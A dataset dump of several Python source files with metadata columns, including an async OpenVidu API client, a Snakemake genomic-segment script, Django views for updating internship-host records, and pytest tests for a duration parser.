hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f7ece2776569264d2287a86f14938345977b68ea | 11,235 | py | Python | openviduconnect/client/asyncclient.py | amoghmadan/openviduconnect | 799526b69c7012e5137d716c90fc762f1a9d26e4 | [
"MIT"
] | 1 | 2021-05-22T04:06:03.000Z | 2021-05-22T04:06:03.000Z | openviduconnect/client/asyncclient.py | amoghmadan/openviduconnect | 799526b69c7012e5137d716c90fc762f1a9d26e4 | [
"MIT"
] | null | null | null | openviduconnect/client/asyncclient.py | amoghmadan/openviduconnect | 799526b69c7012e5137d716c90fc762f1a9d26e4 | [
"MIT"
] | null | null | null | from __future__ import annotations
from urllib.parse import urljoin
from httpx import AsyncClient, Response
from .base import BaseClient
from ..exceptions import (
SessionBodyParameterError,
SessionExistsError,
SessionNotFoundError,
ConnectionBodyParameterError,
ConnectionIPCAMError,
SessionDoesNotExistError,
ConnectionNotFound,
SessionOrConnectionDoesNotExist,
RecordingBodyParameterError,
RecordingResolutionOrBrowserSettingsError,
RecordingNoConnectedParticipantsError,
RecordingNotConfiguredForMediaNodeError,
RecordingDisabledOnServerError,
RecordingNotFoundError,
RecordingStartingProgressError,
RecordingNotCompletedError,
)
class AsyncOpenViduClient(BaseClient):
"""."""
def __aenter__(self):
"""."""
return self
def __aexit__(self, exc_type, exc_val, exc_tb):
"""."""
pass
async def create_session(self: AsyncOpenViduClient, **kwargs: str) -> dict:
"""."""
async with AsyncClient(verify=self._verify, timeout=self._timeout) as client:
response: Response = await client.post(self._apis["sessions"], headers=self._headers, json=kwargs)
if response.status_code == 400:
raise SessionBodyParameterError("Problem with some body parameter")
if response.status_code == 409:
raise SessionExistsError("Parameter customSessionId corresponds to an existing Session")
return response.json()
async def get_session(self: AsyncOpenViduClient, session_id: str) -> dict:
"""."""
url: str = urljoin(self._apis["sessions"], session_id)
async with AsyncClient(verify=self._verify, headers=self._timeout) as client:
response: Response = await client.get(url, headers=self._headers)
if response.status_code == 404:
raise SessionNotFoundError("No Session exists for the passed SESSION_ID")
return response.json()
async def get_sessions(self: AsyncOpenViduClient) -> dict:
"""."""
async with AsyncClient(verify=self._verify, timeout=self._timeout) as client:
response: Response = await client.get(self._apis["sessions"], headers=self._headers)
return response.json()
async def delete_session(self: AsyncOpenViduClient, session_id: str) -> dict:
"""."""
url: str = urljoin(self._apis["sessions"], session_id)
async with AsyncClient(verify=self._verify, headers=self._timeout) as client:
response: Response = await client.delete(url, headers=self._headers)
if response.status_code == 404:
raise SessionNotFoundError("No Session exists for the passed SESSION_ID")
return response.json()
async def create_connection(self: AsyncOpenViduClient, session_id: str, **kwargs: str) -> dict:
"""."""
session_url: str = urljoin(self._apis["sessions"], session_id)
url: str = urljoin(session_url, "connection")
async with AsyncClient(verify=self._verify, timeout=self._timeout) as client:
response: Response = await client.post(url, headers=self._headers, json=kwargs)
if response.status_code == 400:
raise ConnectionBodyParameterError("Problem with some body parameter")
if response.status_code == 404:
raise SessionNotFoundError("No session exists for the passed SESSION_ID")
if response.status_code == 500:
raise ConnectionIPCAMError("Unexpected error when creating the Connection object")
return response.json()
async def get_connection(self: AsyncOpenViduClient, session_id: str, connection_id: str) -> dict:
"""."""
session_url: str = urljoin(self._apis["sessions"], session_id)
connection_url: str = urljoin(session_url, "connection")
url: str = urljoin(connection_url, connection_id)
async with AsyncClient(verify=self._verify, timeout=self._timeout) as client:
response: Response = await client.get(url, headers=self._headers)
if response.status_code == 400:
raise SessionDoesNotExistError("No Session exists for the passed SESSION_ID")
if response.status_code == 404:
raise ConnectionNotFound("No Connection exists for the passed CONNECTION_ID")
return response.json()
async def get_connections(self: AsyncOpenViduClient, session_id: str) -> dict:
"""."""
session_url: str = urljoin(self._apis["session"], session_id)
url: str = urljoin(session_url, "connection")
async with AsyncClient(verify=self._verify, timeout=self._timeout) as client:
response: Response = await client.get(url, headers=self._headers)
if response.status_code == 404:
raise SessionNotFoundError("No Session exists for the passed SESSION_ID")
return response.json()
async def update_connection(self: AsyncOpenViduClient, session_id: str, connection_id: str, **kwargs: str) -> dict:
"""."""
session_url: str = urljoin(self._apis["session"], session_id)
connection_url: str = urljoin(session_url, "connection")
url: str = urljoin(connection_url, connection_id)
async with AsyncClient(verify=self._verify, timeout=self._timeout) as client:
response: Response = await client.patch(url, headers=self._headers, json=kwargs)
if response.status_code == 400:
raise ConnectionBodyParameterError("Problem with some body parameter")
if response.status_code == 404:
raise SessionOrConnectionDoesNotExist(
"No Session exists for the passed SESSION_ID, or no Connection exists for the passed CONNECTION_ID"
)
return response.json()
async def delete_connection(self: AsyncOpenViduClient, session_id: str, connection_id: str) -> dict:
"""."""
session_url: str = urljoin(self._apis["session"], session_id)
connection_url: str = urljoin(session_url, "connection")
url: str = urljoin(connection_url, connection_id)
async with AsyncClient(verify=self._verify, timeout=self._timeout) as client:
response: Response = await client.delete(url, headers=self._headers)
if response.status_code == 400:
raise SessionDoesNotExistError("No Session exists for the passed SESSION_ID")
if response.status_code == 404:
raise ConnectionNotFound("No Connection for the passed CONNECTION_ID")
return response.json()
async def start_recording(self: AsyncOpenViduClient, **kwargs: str) -> dict:
"""."""
url: str = urljoin(self._apis["recordings"], "start")
async with AsyncClient(verify=self._verify, timeout=self._timeout) as client:
response: Response = await client.post(url, headers=self._headers, json=kwargs)
if response.status_code == 400:
raise RecordingBodyParameterError("Problem with some body parameter")
if response.status_code == 404:
raise SessionNotFoundError("No session exists for the passed session body parameter")
if response.status_code == 406:
raise RecordingNoConnectedParticipantsError("The session has no connected participants")
if response.status_code == 409:
raise RecordingNotConfiguredForMediaNodeError(
"The session is not configured for using MediaMode ROUTED or it is already being recorded"
)
if response.status_code == 422:
raise RecordingResolutionOrBrowserSettingsError(
"resolution parameter exceeds acceptable values (for both width and height, min 100px and max 1999px) "
"or trying to start a recording with both hasAudio and hasVideo to false"
)
if response.status_code == 501:
raise RecordingDisabledOnServerError(
"OpenVidu Server recording module is disabled: "
"OPENVIDU_RECORDING configuration property is set to false"
)
return response.json()
async def stop_recording(self: AsyncOpenViduClient, recording_id: str) -> dict:
"""."""
stop_url: str = urljoin(self._apis["recordings"], "stop")
url: str = urljoin(stop_url, recording_id)
async with AsyncClient() as client:
response: Response = await client.post(url, headers=self._headers)
if response.status_code == 404:
raise RecordingNotFoundError("No recording exists for the passed RECORDING_ID")
if response.status_code == 406:
raise RecordingStartingProgressError(
"Recording has starting status. Wait until started status before stopping the recording"
)
if response.status_code == 501:
raise RecordingDisabledOnServerError(
"OpenVidu Server recording module is disabled: "
"OPENVIDU_RECORDING configuration property is set to false"
)
return response.json()
async def get_recording(self: AsyncOpenViduClient, recording_id: str) -> dict:
"""."""
url: str = urljoin(self._apis["recordings"], recording_id)
async with AsyncClient() as client:
response: Response = await client.get(url, headers=self._headers)
if response.status_code == 404:
raise RecordingNotFoundError("No recording exists for the passed RECORDING_ID")
if response.status_code == 501:
raise RecordingDisabledOnServerError(
"OpenVidu Server recording module is disabled: "
"OPENVIDU_RECORDING configuration property is set to false"
)
return response.json()
async def get_recordings(self: AsyncOpenViduClient) -> dict:
"""."""
async with AsyncClient(verify=self._verify, timeout=self._timeout) as client:
response: Response = await client.get(self._apis["recordings"], headers=self._headers)
if response.status_code == 501:
raise RecordingDisabledOnServerError(
"OpenVidu Server recording module is disabled: "
"OPENVIDU_RECORDING configuration property is set to false"
)
return response.json()
async def delete_recording(self: AsyncOpenViduClient, recording_id: str) -> dict:
"""."""
url: str = urljoin(self._apis["recordings"], recording_id)
async with AsyncClient(verify=self._verify, timeout=self._timeout) as client:
response: Response = await client.delete(url, headers=self._headers)
if response.status_code == 404:
raise RecordingNotFoundError("No recording exists for the passed RECORDING_ID")
if response.status_code == 409:
raise RecordingNotCompletedError("The recording has started status. Stop it before deletion")
if response.status_code == 501:
raise RecordingDisabledOnServerError(
"OpenVidu Server recording module is disabled: "
"OPENVIDU_RECORDING configuration property is set to false"
)
return response.json()
| 42.078652 | 119 | 0.668536 | 1,167 | 11,235 | 6.288775 | 0.12425 | 0.039515 | 0.063224 | 0.07903 | 0.782804 | 0.774492 | 0.728437 | 0.718354 | 0.708271 | 0.694236 | 0 | 0.011067 | 0.24397 | 11,235 | 266 | 120 | 42.236842 | 0.852955 | 0.000445 | 0 | 0.572973 | 0 | 0 | 0.18163 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010811 | false | 0.075676 | 0.027027 | 0 | 0.124324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
f73ae32d45268745bd5104686ff427d4eb9ae7ec | 110 | py | Python | lang/Python/logical-operations.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | null | null | null | lang/Python/logical-operations.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | null | null | null | lang/Python/logical-operations.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | null | null | null | def logic(a, b):
print(('a and b:', a and b))
print(('a or b:', a or b))
print(('not a:', not a))
| 22 | 32 | 0.463636 | 23 | 110 | 2.217391 | 0.347826 | 0.352941 | 0.27451 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.281818 | 110 | 4 | 33 | 27.5 | 0.64557 | 0 | 0 | 0 | 0 | 0 | 0.190909 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.25 | 0.75 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
f7746b12f4606d4a96195a97eac3ad30fa23da10 | 180 | py | Python | app/fields/__init__.py | PhotoScout/API | 24c2040b0a2fcb1ea906c7aa095c9e74d3ca4fa9 | [
"MIT"
] | null | null | null | app/fields/__init__.py | PhotoScout/API | 24c2040b0a2fcb1ea906c7aa095c9e74d3ca4fa9 | [
"MIT"
] | null | null | null | app/fields/__init__.py | PhotoScout/API | 24c2040b0a2fcb1ea906c7aa095c9e74d3ca4fa9 | [
"MIT"
] | null | null | null | from .user import USER_SHORT_FIELDS, USER_FIELDS
from .guide import GUIDE_FIELDS
from .photo import PHOTO_FIELDS
from .misc import LOCATION_FIELDS
from .places import PLACE_FIELDS
| 30 | 48 | 0.85 | 28 | 180 | 5.214286 | 0.392857 | 0.273973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116667 | 180 | 5 | 49 | 36 | 0.918239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f798466f98f29d017a21d2919b4681124edb7057 | 2,564 | py | Python | scripts/survival/overlap_split_segment.py | PerinatalLab/ROH | 703d7aa81d1c5e7d61e75597d43905b337c06f9a | [
"MIT"
] | null | null | null | scripts/survival/overlap_split_segment.py | PerinatalLab/ROH | 703d7aa81d1c5e7d61e75597d43905b337c06f9a | [
"MIT"
] | null | null | null | scripts/survival/overlap_split_segment.py | PerinatalLab/ROH | 703d7aa81d1c5e7d61e75597d43905b337c06f9a | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
df_list= list()
if 'frequency' not in snakemake.input[0]:
d= pd.read_csv(snakemake.input[0], sep= '\t', header= None, names= ['segment', 'n', 'beta', 'sd', 'pvalue'])
d[['chr', 'cM1', 'cM2']]= d['segment'].str.split(':', expand= True)
d[['chr', 'cM1', 'cM2']]= d[['chr', 'cM1', 'cM2']].apply(lambda x: x.astype('float'))
for infile in snakemake.input[1:]:
df= pd.read_csv(infile, sep= '\t', header= None, names= ['segment', 'n', 'beta', 'sd', 'pvalue'])
df[['chr', 'cM1', 'cM2']]= df['segment'].str.split(':', expand= True)
df[['chr', 'cM1', 'cM2']]= df[['chr', 'cM1', 'cM2']].apply(lambda x: x.astype('float'))
df= df[['chr', 'cM1', 'cM2']]
df_list.append(df)
df= pd.concat(df_list)
df_list= list()
for CHR in set(d.chr):
a= df.loc[df.chr== CHR, :]
a= pd.concat([a.cM1, a.cM2])
a= np.unique(a)
a= np.sort(a)
temp_d= d.loc[d.chr== CHR, :]
for index, row in temp_d.iterrows():
bh= row.cM2
bl= row.cM1
i, j = np.where((a[:, None] >= bl) & (a[:, None] <= bh))
x= pd.DataFrame(a[i], columns= ['cM1']).dropna()
x['cM2']= x.cM1.shift(-1)
x.dropna(inplace= True)
x['chr'], x['n'], x['beta'], x['sd'], x['pvalue']= row.chr, row.n, row.beta, row.sd, row.pvalue #, row.R, row.Rpvalue
df_list.append(x.copy())
if 'frequency' in snakemake.input[0]:
d= pd.read_csv(snakemake.input[0], sep= '\t', header= None, names= ['chr', 'segment', 'freq'])
d[['cM1', 'cM2']]= d['segment'].str.split(':',expand=True)
d[['cM1', 'cM2']]= d[['cM1', 'cM2']].apply(lambda x: x.astype('float'))
df_list= list()
for infile in snakemake.input[1:]:
df= pd.read_csv(infile, sep= '\t', header= None, names= ['chr', 'segment', 'freq'])
df[['cM1', 'cM2']]= df['segment'].str.split(':', expand= True)
df[['cM1', 'cM2']]= df[['cM1', 'cM2']].apply(lambda x: x.astype('float'))
df= df[['chr', 'cM1', 'cM2']]
df_list.append(df)
df= pd.concat(df_list)
df_list= list()
for CHR in set(d.chr):
a= df.loc[df.chr== CHR, :]
a= pd.concat([a.cM1, a.cM2])
a= np.unique(a)
a= np.sort(a)
temp_d= d.loc[d.chr== CHR, :]
for index, row in temp_d.iterrows():
bh= row.cM2
bl= row.cM1
i, j = np.where((a[:, None] >= bl) & (a[:, None] <= bh))
x= pd.DataFrame(a[i], columns= ['cM1']).dropna()
x['cM2']= x.cM1.shift(-1)
x.dropna(inplace= True)
x['chr'], x['freq']= row.chr, row.freq
df_list.append(x.copy())
df= pd.concat(df_list)
df.to_csv(snakemake.output[0], header= True, sep= '\t', index= False)
| 37.15942 | 120 | 0.555772 | 432 | 2,564 | 3.252315 | 0.164352 | 0.059786 | 0.051246 | 0.039146 | 0.846975 | 0.801423 | 0.788612 | 0.788612 | 0.768683 | 0.623488 | 0 | 0.024148 | 0.176287 | 2,564 | 68 | 121 | 37.705882 | 0.641098 | 0.0078 | 0 | 0.683333 | 0 | 0 | 0.114432 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.033333 | 0 | 0.033333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e3a7d82d5b870d54b06abe74ca1ba61383d8412e | 35 | py | Python | glue/dialogs/link_editor/qt/__init__.py | HPLegion/glue | 1843787ccb4de852dfe103ff58473da13faccf5f | [
"BSD-3-Clause"
] | 550 | 2015-01-08T13:51:06.000Z | 2022-03-31T11:54:47.000Z | glue/dialogs/link_editor/qt/__init__.py | HPLegion/glue | 1843787ccb4de852dfe103ff58473da13faccf5f | [
"BSD-3-Clause"
] | 1,362 | 2015-01-03T19:15:52.000Z | 2022-03-30T13:23:11.000Z | glue/dialogs/link_editor/qt/__init__.py | HPLegion/glue | 1843787ccb4de852dfe103ff58473da13faccf5f | [
"BSD-3-Clause"
] | 142 | 2015-01-08T13:08:00.000Z | 2022-03-18T13:25:57.000Z | from .link_editor import * # noqa
| 17.5 | 34 | 0.714286 | 5 | 35 | 4.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 35 | 1 | 35 | 35 | 0.857143 | 0.114286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e3b1d0568736aa88c87012a5994a992562a2e54b | 114 | py | Python | text2sql/state_machines/trainers/__init__.py | inbaroren/improving-compgen-in-semparse | 06463b94f3d1b291759c08783d5a8661e2960f2e | [
"MIT"
] | 15 | 2020-09-30T12:24:29.000Z | 2021-12-24T13:45:25.000Z | text2sql/state_machines/trainers/__init__.py | inbaroren/improving-compgen-in-semparse | 06463b94f3d1b291759c08783d5a8661e2960f2e | [
"MIT"
] | 2 | 2021-04-21T14:07:41.000Z | 2021-12-28T13:26:59.000Z | text2sql/state_machines/trainers/__init__.py | inbaroren/improving-compgen-in-semparse | 06463b94f3d1b291759c08783d5a8661e2960f2e | [
"MIT"
] | 2 | 2020-10-19T22:06:45.000Z | 2021-02-05T22:08:23.000Z | from text2sql.state_machines.trainers.maximum_marginal_likelihood_attn_sup import MaximumMarginalLikelihoodAttnSup | 114 | 114 | 0.947368 | 12 | 114 | 8.583333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 0.026316 | 114 | 1 | 114 | 114 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e3fa617382ba097c4b41c0c3d60e4760d743ad90 | 1,862 | py | Python | master/views_instansi_update.py | HilmiZul/epkl3 | 63df215eb1676cf5ab2f36f2f20436b19b540b9a | [
"MIT"
] | 6 | 2019-02-15T07:15:33.000Z | 2021-01-05T12:18:21.000Z | master/views_instansi_update.py | HilmiZul/epkl3 | 63df215eb1676cf5ab2f36f2f20436b19b540b9a | [
"MIT"
] | 6 | 2019-09-14T14:47:48.000Z | 2022-03-12T00:56:51.000Z | master/views_instansi_update.py | HilmiZul/epkl3 | 63df215eb1676cf5ab2f36f2f20436b19b540b9a | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.conf import settings
from django.contrib.auth.decorators import login_required
from .models import Instansi
from django.contrib import messages
@login_required(login_url=settings.LOGIN_URL)
def ubah_instansi_rpl(request, id_instansi):
if request.POST:
Instansi.objects.filter(id=id_instansi).update(
nama = request.POST['nama'],
alamat = request.POST['alamat'],
pimpinan = request.POST['pimpinan'],
pembimbing = request.POST['pembimbing'],
kontak = request.POST['kontak'],
email = request.POST['email'],
kuota = request.POST['kuota'],
gender = request.POST['gender']
)
msg = "Data berhasil diperbaharui."
instansi = Instansi.objects.get(id=id_instansi)
return render(request, 'ubah-instansi-rpl.html',
{
'msg':msg,
'instansi':instansi,
}
)
else:
instansi = Instansi.objects.get(id=id_instansi)
return render(request, 'ubah-instansi-rpl.html', {'instansi':instansi})
@login_required(login_url=settings.LOGIN_URL)
def ubah_instansi_tkj(request, id_instansi):
if request.POST:
Instansi.objects.filter(id=id_instansi).update(
nama = request.POST['nama'],
alamat = request.POST['alamat'],
pimpinan = request.POST['pimpinan'],
pembimbing = request.POST['pembimbing'],
kontak = request.POST['kontak'],
email = request.POST['email'],
kuota = request.POST['kuota'],
gender = request.POST['gender']
)
msg = "Data berhasil diperbaharui."
instansi = Instansi.objects.get(id=id_instansi)
return render(request, 'ubah-instansi-tkj.html',
{
'instansi':instansi,
'msg':msg,
}
)
else:
instansi = Instansi.objects.get(id=id_instansi)
return render(request, 'ubah-instansi-tkj.html', {'instansi':instansi}) | 33.25 | 73 | 0.670784 | 217 | 1,862 | 5.668203 | 0.198157 | 0.160976 | 0.058537 | 0.084553 | 0.826016 | 0.826016 | 0.826016 | 0.826016 | 0.826016 | 0.826016 | 0 | 0 | 0.192266 | 1,862 | 56 | 74 | 33.25 | 0.817819 | 0 | 0 | 0.641509 | 0 | 0 | 0.150295 | 0.047236 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037736 | false | 0 | 0.09434 | 0 | 0.207547 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
581d6298746364859292632dd471742867e7d2f5 | 268 | py | Python | tests/dir_cases/test1-python-expected/baz.py | div72/py2many | 60277bc13597bd32d078b88a7390715568115fc6 | [
"MIT"
] | 345 | 2021-01-28T17:33:08.000Z | 2022-03-25T16:07:56.000Z | tests/dir_cases/test1-python-expected/baz.py | mkos11/py2many | be6cfaad5af32c43eb24f182cb20ad63b979d4ef | [
"MIT"
] | 291 | 2021-01-31T13:15:06.000Z | 2022-03-23T21:28:49.000Z | tests/dir_cases/test1-python-expected/baz.py | mkos11/py2many | be6cfaad5af32c43eb24f182cb20ad63b979d4ef | [
"MIT"
] | 23 | 2021-02-09T17:15:03.000Z | 2022-02-03T05:57:44.000Z | from typing import Callable, Dict, List, Set, Optional
from ctypes import c_int8 as i8, c_int16 as i16, c_int32 as i32, c_int64 as i64
from ctypes import c_uint8 as u8, c_uint16 as u16, c_uint32 as u32, c_uint64 as u64
import sys
def baz1() -> str:
return "foo"
| 29.777778 | 83 | 0.742537 | 53 | 268 | 3.603774 | 0.622642 | 0.104712 | 0.167539 | 0.17801 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134259 | 0.19403 | 268 | 8 | 84 | 33.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0.011194 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.666667 | 0.166667 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
582e8e8bea1ab3a15b450fd12ad655de940d63f4 | 1,541 | py | Python | python/test/test_chrono.py | Diego2la/tll | a2e7fa552c16ca98a14b76f2511025384342c4d1 | [
"MIT"
] | 4 | 2019-09-25T14:19:05.000Z | 2021-03-19T07:58:03.000Z | python/test/test_chrono.py | Diego2la/tll | a2e7fa552c16ca98a14b76f2511025384342c4d1 | [
"MIT"
] | 3 | 2021-10-20T04:53:34.000Z | 2021-11-23T08:57:12.000Z | python/test/test_chrono.py | Diego2la/tll | a2e7fa552c16ca98a14b76f2511025384342c4d1 | [
"MIT"
] | 2 | 2021-10-16T12:39:35.000Z | 2022-03-17T09:11:52.000Z | #!/usr/bin/env python3
# vim: sts=4 sw=4 et
import pytest
from tll.chrono import *
def test_str():
assert str(Duration(100, Resolution.ns, type=float)) == '100.0ns'
assert str(Duration(100, 'ns', type=int)) == '100ns'
assert str(Duration(100, (1, 1000000000), type=int)) == '100ns'
assert str(Duration(100, Resolution.us, type=int)) == '100us'
assert str(Duration(100, Resolution.ms, type=int)) == '100ms'
assert str(Duration(100, Resolution.second, type=int)) == '100s'
assert str(Duration(100, Resolution.minute, type=int)) == '100m'
assert str(Duration(100, Resolution.hour, type=int)) == '100h'
assert str(Duration(100, Resolution.day, type=int)) == '100d'
def test_from_str():
assert Duration.from_str('100ns') == Duration(100, Resolution.ns, type=int)
assert Duration.from_str('-100ns') == Duration(-100, Resolution.ns, type=int)
assert Duration.from_str('100.0ns') == Duration(100, Resolution.ns, type=float)
assert Duration.from_str('1e2ns') == Duration(100.0, Resolution.ns, type=float)
assert Duration.from_str('100us') == Duration(100, Resolution.us, type=int)
